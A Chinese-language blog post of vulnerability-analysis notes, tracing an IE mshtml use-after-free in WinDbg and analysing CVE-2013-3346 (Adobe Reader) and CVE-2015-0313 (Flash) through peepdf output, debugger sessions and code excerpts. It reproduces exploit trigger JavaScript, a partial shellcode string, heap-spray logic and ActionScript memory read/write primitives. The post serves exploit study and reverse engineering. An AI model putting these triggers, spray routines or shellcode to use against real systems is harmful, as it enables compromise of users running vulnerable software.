    0b367fd8 74809250 mshtml!CHRElement::`vftable'   ;hr标签

    继续代码:

    try{
    f0.offsetParent=null; //required 书上说这条代码的作用是将它的祖先元素设置为NULL(当没有css定位时,offsetParent属性即为body); 注意 offsetParent 在DOM中是只读属性, 赋值本身会抛出异常(所以用try/catch包住), 但这一步仍会触发下面要跟踪的 CElement::GetOffsetParentHelper
    }catch(e){ }

    同理 ,搜索 x mshtml!*offsetParent*:

    0:005> x mshtml!*offsetParent*
    7483128e mshtml!CDisplayRequestGetOffsetParent::~CDisplayRequestGetOffsetParent = <no type information>
    748311ca mshtml!CDisplayRequestGetOffsetParent::CDisplayRequestGetOffsetParent = <no type information>
    748316cd mshtml!CDisplayBox::IsOffsetParent = <no type information>
    74831709 mshtml!CDisplayBox::FindOffsetParent = <no type information>
    74829d65 mshtml!CDisplayRequestGetOffsetParent::GetOffsetTopLeft = <no type information>
    748312b3 mshtml!CLayoutBlock::IsOffsetParent = <no type information>
    74831915 mshtml!CDisplayRequestGetOffsetParent::SetOffsetParentDisplayBox = <no type information>
    748311e3 mshtml!CDisplayRequestGetOffsetParent::OffsetParent = <no type information>
    7490cd62 mshtml!CElement::GetOffsetParentHelper = <no type information>
    748319b1 mshtml!CTextDisplayBox::IsOffsetParent = <no type information>
    749cc914 mshtml!s_propdescCElementoffsetParent = <no type information>
    7483192d mshtml!CDisplayRequestGetOffsetParent::SetSourceDisplayBox = <no type information>
    7490d418 mshtml!CElement::get_offsetParent = <no type information>
    74831798 mshtml!CDisplayBox::TransformRectToOffsetParent = <no type information>

    对mshtml!CElement::GetOffsetParentHelper开始处和结尾处下断 调试:

    '--CtreeNode--'
    0af6efb0 09938fb8
    09938fb8 747c6488 mshtml!CTable::`vftable'
    Breakpoint 2 hit
    eax=0957cfd8 ebx=00000000 ecx=748cd418 edx=00000000 esi=0957cfd8 edi=0845cfa8
    eip=748ccd62 esp=0845cf10 ebp=0845cf20 iopl=0 nv up ei pl nz na po nc
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
    mshtml!CElement::GetOffsetParentHelper:
    748ccd62 8bff mov edi,edi

    0:005> dd 0af6efb0
    0af6efb0 09938fb8 09181fb0 ffff0261 ffffffff
    0af6efc0 00000061 00000000 0bebefc0 09181fc0
    0af6efd0 09181fc0 0af6efd8 00000052 00000000
    0af6efe0 09181fd8 0b390fc0 0af6efc0 09181fd8
    0af6eff0 00000008 00000000 00000000 d0d0d0d0

    0:005> g
    Breakpoint 3 hit
    eax=0e79efb0 ebx=00000000 ecx=0c802fc0 edx=0845ced0 esi=0957cfd8 edi=0845cfa8
    eip=748ccdde esp=0845cf10 ebp=0845cf20 iopl=0 nv up ei pl nz na po nc
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
    mshtml!CElement::GetOffsetParentHelper+0x135:
    748ccdde c3 ret
    0:005> dd 0b390fb0
    0b390fb0 0d071fc8 0bebefb0 000a0275 00000009 ;书上的是1
    0b390fc0 00000151 00000001 0bebefc0 0e6a2fd8
    0b390fd0 0bebefc0 0b390fd8 00000072 00000000
    0b390fe0 00000000 0bebefd8 0b390fc0 0bebefd8
    0b390ff0 00000018 0a8abfa0 00000000 d0d0d0d0

    0:005> ln poi(0a8abfa0 )
    (7489633c) mshtml!CTextBlock::`vftable' | (74896348) mshtml!CTableContainerBlock::`vftable'
    Exact matches:
    mshtml!CTextBlock::`vftable' = <no type information>

    对treenode + 0xc 的4字节部分下内存写入断点:

    待续...........

    CVE-2013-3346-Adobe Reader ToolButton 释放重引用漏洞

    1.使用peepdf分析 pdf, JavaScript, shellcode

    基本命令:

    Usage: ./peepdf.py [options] PDF_file

    Version: peepdf 0.3 r235

    Options:
    -h, --help   show this help message and exit
    -i, --interactive    Sets console mode.
    -s SCRIPTFILE,  --load-script=SCRIPTFILE
        Loads the commands stored in the specified file and execute them.
    -c, --check-vt   Checks the hash of the PDF file on VirusTotal.
    -f, --force-mode    Sets force parsing mode to ignore errors.
    -l, --loose-mode    Sets loose parsing mode to catch malformed objects.
    -m,   --manual-analysis
    Avoids automatic Javascript analysis. Useful with
    eternal loops like heap spraying.
    -g, --grinch-mode      Avoids colorized output in the interactive console.
    -v, --version        Shows program's version number.
    -x, --xml         Shows the document information in XML format.

    控制台中的命令:

    PPDF> help

    Documented commands (type help <topic>):
    ========================================
    bytes     exit js_join quit set
    changelog    filters js_unescape rawobject show
    create    hash js_vars rawstream stream
    decode   help log references tree
    decrypt   info malformed_output replace vtcheck
    embed   js_analyse metadata reset xor
    encode    js_beautify modify save xor_search
    encode_strings    js_code object save_version
    encrypt   js_eval offsets sctest
    errors    js_jjdecode open search

    加载pdf文档

    root@kali:~# peepdf -i -f /root/Desktop/6776bda19a3a8ed4c2870c34279dbaa9.pdf
    Warning: PyV8 is not installed!!

    File: 6776bda19a3a8ed4c2870c34279dbaa9.pdf
    MD5: 6776bda19a3a8ed4c2870c34279dbaa9
    SHA1: ad6a3564e125683a791ee98c5d1e66e1d9c6877d
    Size: 177511 bytes
    Version: 1.1
    Binary: False
    Linearized: False
    Encrypted: False
    Updates: 0

    查看pdf文档的object:

    PPDF> object 1

    << /AcroForm << /Fields [ << /Parent 10 0 R
    /Kids [ << /Ff 99999
    /MK << /TP 1 >>
    /Rect [ 0 0 0 0 ]
    /FT /Btn
    /T ImageField1[0]
    /Subtype /Widget >> ]
    /T SubFormNumberOne[0] >> ]
    /XFA [ 10 0 R ] >>
    /OpenAction 2 0 R
    /Pages 2 0 R >>

    使用 js_jjdecode 解码(经 jjencode 混淆的)JavaScript:

    PPDF> js_jjdecode file /root/jj_encode.js

    var shellcode = unescape("%u00E8%u0000%u5D00%uED83%uE905%u008B%u0000%u5052%uD231%uC031%uF980%u7501%u6604%uEBAD%uAC01%u003C%u0D74%u613C%u0272%u202C%uCAC1%u010D%uEBC2%u39E3%u58DA%uC35A%u8956%uB2DA%u313C%u66C0%u028B%uD801%u508B%u0178%u52DA%u8B51%u184A%u428B%u0120%u8BD8%u0138%u53DF%u1E8B%uF787%u3151%uE8C9%uFFAE%uFFFF%u5B59%uF787%u0275%u08EB%uC083%u4904%u22E3%uDFEB%u428B%u2918%u89C8%u8BC1%u2442%uD801%u8B66%u480C%u428B%u011C%uC1D8%u02E1%uC801%u008B%uD801%u0689%u5A59%uC683%uE204%u5EAE%u31C3%u64D2%u528B%u8B30%u0C52%u528B%uB114%u8B01%u28 ....................................................

    提取并分析js中的shellcode:

    js_jjdecode file /root/jj_encode.js $> decode

    js_analyse variable decode $> shellcode

    show shellcode

    使用sctest 分析shellcode的行为

    sctest -v variable shellcode

    2.分析恶意js中的触发漏洞的代码

    代码很长, 但触发漏洞的只有这一小段:

    // Trigger for CVE-2013-3346 (Adobe Reader ToolButton use-after-free), excerpted from a much longer script.
    app.addToolButton({
        cName: "evil",                  // parent button
        cExec: "1",
        cEnable: "addButtonFunc();"     // its cEnable callback creates the child button
    });
    
    addButtonFunc = function() {
        // child button whose cEnable callback removes the parent
        app.addToolButton({cName: "xxx", cExec: "1", cEnable: "removeButtonFunc();"});
    }
    
    removeButtonFunc = function() {
        // "evil" is destroyed while Reader is still inside the parent button's callback;
        // the freed object is then used again (see the call through [esi] in the ub output below)
        app.removeToolButton({cName: "evil"});
    
        // arr, part1 and part2 are defined elsewhere in the full script (not in this excerpt).
        // NOTE(review): the `dd esi` output further down shows the freed object's memory filled with
        // 41414141 — presumably this loop is what re-occupies it; not verified here.
        for (i=0;i < 10;i++)
            arr[i] = part1.concat(part2);
    }

    先创建一个名为"evil"的button, 其cEnable回调是addButtonFunc; 该函数再创建一个子button,

    子button的回调函数销毁了父button "evil", 而此时Reader内部仍然引用着父button对象(从后面的崩溃点可以看到回调返回后代码仍通过esi使用该对象), 故触发UAF

    加载到windbg后,再加载exp.pdf 断下:

    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=0c0c08a8 ebx=00000001 ecx=05dbb3a8 edx=00201ddf esi=05dbb3a8 edi=00000000
    eip=4a82f129 esp=002ef0dc ebp=002ef100 iopl=0 nv up ei pl zr ac pe cy
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210257
    4a82f129 ?? ???
    *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.dll -

    查看栈:

    0:000> kv
    ChildEBP RetAddr Args to Child
    WARNING: Frame IP not in any known module. Following frames may be wrong.
    002ef0d8 65bde85d fea08b91 00000001 05dbb3a8 0x4a82f129
    002ef100 65bde0d2 05da92e0 073ba7f8 05dbb3a8 AcroRd32_65a40000!DllCanUnloadNow+0x150536
    002ef124 65c19743 77d96b7e 00000000 05261638 AcroRd32_65a40000!DllCanUnloadNow+0x14fdab
    002ef138 65c22e07 00000000 002ef394 65aa8fdf AcroRd32_65a40000!CTJPEGDecoderRelease+0x2d613
    002ef144 65aa8fdf 05da92e0 fea08905 00000000 AcroRd32_65a40000!CTJPEGDecoderRelease+0x36cd7
    002ef394 65aa8091 fea08951 00000000 01227ac8 AcroRd32_65a40000!DllCanUnloadNow+0x1acb8
    002ef3c0 65aa7ee7 00000000 fea08961 00000000 AcroRd32_65a40000!DllCanUnloadNow+0x19d6a
    002ef3f0 65aa7c78 00000000 fea08ef5 00000000 AcroRd32_65a40000!DllCanUnloadNow+0x19bc0
    002ef464 65aa7ac1 fea08e0d 00000000 01227ac8 AcroRd32_65a40000!DllCanUnloadNow+0x19951

    对红色部分进行ub:

    0:000> ub AcroRd32_65a40000!DllCanUnloadNow+0x150536
    AcroRd32_65a40000!DllCanUnloadNow+0x150518:
    65bde83f 897dfc mov dword ptr [ebp-4],edi
    65bde842 ff96d0020000 call dword ptr [esi+2D0h]
    65bde848 0fb7d8 movzx ebx,ax
    65bde84b 8b06 mov eax,dword ptr [esi]
    65bde84d 59 pop ecx
    65bde84e 8bce mov ecx,esi
    65bde850 66899ecc020000 mov word ptr [esi+2CCh],bx
    65bde857 ff9064030000 call dword ptr [eax+364h]

    0:000> !heap -p -a esi
    address 0623c558 found in
    _HEAP @ 2c90000
    HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
    0623c550 0071 0000 [00] 0623c558 00370 - (busy)

    然后
    0:000> r esi
    esi=0623c558
    0:000> dd eax
    0c0c08a8 4a848003 4a848003 4a848003 4a848003
    0c0c08b8 4a848003 4a848003 4a848003 4a848003
    0c0c08c8 4a848003 4a848003 4a848003 4a848003
    0c0c08d8 4a848003 4a848003 4a848003 4a848003
    0c0c08e8 4a848003 4a848003 4a848003 4a848003
    0c0c08f8 4a848003 4a848003 4a848003 4a848003
    0c0c0908 4a848003 4a848003 4a848003 4a848003
    0c0c0918 4a848003 4a848003 4a848003 4a848003
    0:000> dd esi
    0623c558 0c0c08a8 41414141 41414141 41414141
    0623c568 41414141 41414141 41414141 41414141
    0623c578 41414141 41414141 41414141 41414141
    0623c588 41414141 41414141 41414141 41414141
    0623c598 41414141 41414141 41414141 41414141
    0623c5a8 41414141 41414141 41414141 41414141
    0623c5b8 41414141 41414141 41414141 41414141

    esi是个对象, eax是其虚函数表指针, esi和eax都被劫持. 代码中正是调用了某虚函数才导致崩溃,因此利用heap spray 将shellcode喷射到[eax+364h]即可

    .

    分析漏洞利用的话,就需要结合exp和各种动态调试,静态逆向分析了.

    CVE-2015-0313 Adobe Flash Player Workers ByteArray 释放重引用漏洞

     1. 首先简单分析一下特殊的swf文件源码

                ba.length = 0x1000
                ba.shareable = true
                
                // 喷射vector.<object>到堆上,然后间隔释放产生内存空洞3
                for (var i:uint = 0; i < ov.length; i++) {
                //ov的每个元素是vector,每个vector存储了ba对象和this指针
                    ov[i] = new Vector.<Object>(1014)   // 1014=0x3f6
                    ov[i][0] = ba
                    ov[i][1] = this
                }
                
                //间隔一个删除一个ov的vector对象
                for (i = 0; i < ov.length; i += 2)
                    delete(ov[i])
                
                worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes) //创建线程
                mc = worker.createMessageChannel(Worker.current)    //创建消息信道
                mc.addEventListener(Event.CHANNEL_MESSAGE, onMessage)//设置回调函数
                worker.setSharedProperty("mc", mc)
                worker.setSharedProperty("ba", ba)
                ApplicationDomain.currentDomain.domainMemory = ba   // 设置ba为全局内存可访问
                worker.start()

    还有

    // Worker side of the CVE-2015-0313 demonstration. The main thread (see the preceding
    // excerpt) shared `ba` with this worker and set it as
    // ApplicationDomain.currentDomain.domainMemory; ba.clear() below releases the backing
    // buffer while domainMemory still references it (the use-after-free). The remaining
    // lines are the write-up's demonstration that the dangling reference now aliases a
    // freshly allocated Vector. The defensive fix (invalidating or re-validating
    // domainMemory when the backing buffer is released) is not shown on this page.
    // ov, vector_read and vector_write are defined outside this excerpt.
    private function workerThread():void
            {
                var ba:ByteArray = Worker.current.getSharedProperty("ba")
                var mc:MessageChannel = Worker.current.getSharedProperty("mc")
                ba.clear()  // clear ba, but domainMemory still keeps a reference to ba.buffer
                
                ov[0] = new Vector.<uint>(1022) // 1022(0x3FE)*4+8=0x1000, same size as ba
                mc.send("")
                while (mc.messageAvailable);    // spin-wait; presumably until the main thread has taken the message
                
                // next vector + (0x403-0x3FE)*4 - 0x18 = start address of the next vector;
                // subtracting 0x1000 (the Vector object's size) gives the address of ov[0][0] itself
                ov[0][0] = ov[0][0x403] - 0x18 - 0x1000
                ba.length = 0x500000
                var buffer:uint = vector_read(vector_read(ov[0][0x408] - 1 + 0x40) + 8) + 0x100000    
                var main:uint = ov[0][0x409] - 1
                var vtable:uint = vector_read(main)
                vector_write(vector_read(ov[0][0x408] - 1 + 0x40) + 8)  // zero the buffer field
                vector_write(vector_read(ov[0][0x408] - 1 + 0x40) + 16, 0xffffffff) // write 0xFFFFFFFF as the buffer length
                mc.send(ov[0][0].toString() + "/" + buffer.toString() + "/" + main.toString() + "/" + vtable.toString())
            }

    分析漏洞的思路和分析ie漏洞类似, 但是flash没有提供符号文件, 这时需要利用avmplus和source light 来帮助定位一些函数和操作

    根据漏洞swf源码,主要分析ByteArray对象的clear之类的函数, domainMemory操作. 借用avmplus和ida找到其对应的汇编代码.

    对byteArray清空的函数: flash32_16_0_0_257+0x66a743  (下载不到296这个版本,所以用随书文件的296替换下载的257并更名为257也可以正常使用)

    操作domainMemory:flash32_16_0_0_257+0x69c659

    0:019> u flash32_16_0_0_257+0x66a743
    Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0xeac93:
    6697a743 895808 mov dword ptr [eax+8],ebx
    6697a746 e838f30800 call Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0x179fd3 (66a09a83)
    6697a74b 8bce mov ecx,esi
    6697a74d 885814 mov byte ptr [eax+14h],bl
    6697a750 e82ef30800 call Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0x179fd3 (66a09a83)
    6697a755 8bce mov ecx,esi
    6697a757 89580c mov dword ptr [eax+0Ch],ebx
    6697a75a e824f30800 call Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0x179fd3 (66a09a83)


    0:019> ub flash32_16_0_0_257+0x66a743
    Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0xeac79:
    6697a729 3bc3 cmp eax,ebx
    6697a72b 740d je Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0xeac8a (6697a73a)
    6697a72d 8b0d84962767 mov ecx,dword ptr [Flash32_16_0_0_257!AdobeCPGetAPI+0x7580a4 (67279684)]
    6697a733 8bd0 mov edx,eax
    6697a735 e826f2f7ff call Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0x69eb0 (668f9960)
    6697a73a 8bce mov ecx,esi
    6697a73c e842f30800 call Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0x179fd3 (66a09a83)
    6697a741 8bce mov ecx,esi


    0:019> u flash32_16_0_0_257+0x69c659
    Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0x11cba9:
    669ac659 8b442408 mov eax,dword ptr [esp+8]
    669ac65d 894214 mov dword ptr [edx+14h],eax
    669ac660 81feffffff7f cmp esi,7FFFFFFFh
    669ac666 7605 jbe Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0x11cbbd (669ac66d)
    669ac668 beffffff7f mov esi,7FFFFFFFh
    669ac66d 897218 mov dword ptr [edx+18h],esi
    669ac670 e88bffffff call Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0x11cb50 (669ac600)
    669ac675 8b4010 mov eax,dword ptr [eax+10h]

    下条件记录断点:

    bp Flash32_16_0_0_257+0x69c659 ".echo '=====globalmemory===';dd esp+8;gc"

    bp flash32_16_0_0_257+0x66a743 ".if(poi(eax+0x10)==0x1000){.echo '====bytearrary buffer====';dd eax+8}.else{gc}"

    '=====globalmemory==='
    0267f518 07867000 00001000 065f1920 065762b8
    0267f528 077a4040 6778c62d 077a4040 6778c904
    0267f538 065f1920 065762b8 0776c180 0267f710
    0267f548 67363dd4 065f1920 0660b020 0785d610
    0267f558 0669bc80 67374f41 0778a020 065762b8
    0267f568 0267f590 67374f4f 065f1920 6779ee7a
    0267f578 0785d610 00000001 0267f5d8 00000000
    0267f588 67374f41 077dcfb8 0267f640 0783d959
    '====bytearrary buffer===='
    06537238 07867000 00001000 00001000 00000000
    06537248 2e777777 7263616d 64656d6f 632e6169
    06537258 00006d6f 00000000 2e777777 7263616d
    06537268 64656d6f 632e6169 00006d6f 00000000
    06537278 67c82d40 00009c89 00000000 06542000
    06537288 0000009a 00000000 6c696638 73726574
    06537298 7274382c 66736e61 006d726f 00000000
    065372a8 756c6176 2c664f65 74536f74 676e6972
    eax=06537230 ebx=00000000 ecx=0769ff34 edx=00000000 esi=0769ff34 edi=0769ff10
    eip=6775a743 esp=07b7f110 ebp=07b7f180 iopl=0 nv up ei pl zr na pe nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
    Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0xeac93:
    6775a743 895808 mov dword ptr [eax+8],ebx ds:0023:06537238=07867000

    然后直接看swf源码的分析

  • 原文地址:https://www.cnblogs.com/freesec/p/6435483.html